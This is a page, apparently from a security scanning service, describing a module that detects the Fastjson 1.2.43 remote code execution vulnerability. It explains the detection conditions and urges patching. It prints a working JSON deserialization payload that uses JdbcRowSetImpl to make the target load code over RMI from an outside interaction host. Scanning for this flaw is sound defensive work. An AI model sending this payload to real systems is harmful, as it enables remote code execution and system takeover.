Automate Recon and scanning process with Vidoc. All security teams in one place
By kannthu
The "Fastjson 1.2.43 - Remote Code Execution" module is designed to detect a critical vulnerability in the Fastjson 1.2.43 software. Fastjson is a Java library used for parsing and generating JSON data. This module specifically targets version 1.2.43 of Fastjson.
This vulnerability allows remote attackers to execute arbitrary code on the target system, potentially leading to a complete compromise of the affected application. It is crucial to address this vulnerability promptly to prevent unauthorized access and potential data breaches.
If successfully exploited, this vulnerability can have severe consequences for the affected application and its users. An attacker can execute arbitrary code remotely, which may result in unauthorized access, data manipulation, or even a complete takeover of the system. This can lead to the exposure of sensitive information, disruption of services, and potential financial and reputational damage.
The "Fastjson 1.2.43 - Remote Code Execution" module works by sending a crafted HTTP request to the target system. The request is designed to exploit the vulnerability in Fastjson 1.2.43 and execute arbitrary code on the target system.
Here is an example of the HTTP request sent by the module:
POST / HTTP/1.1
Host: <Hostname>
Content-Type: application/json
{
"@type":"com.sun.rowset.JdbcRowSetImpl",
"dataSourceName":"rmi://<InteractionURL>/Exploit",
"autoCommit":true
}
The module also includes matching conditions to determine if the vulnerability is present. It checks for the presence of the "dns" protocol in the response and verifies that the HTTP status code is not 200. If both conditions are met, the module reports the vulnerability.
It is essential to regularly scan and patch systems running Fastjson 1.2.43 to mitigate the risk of remote code execution and protect against potential attacks.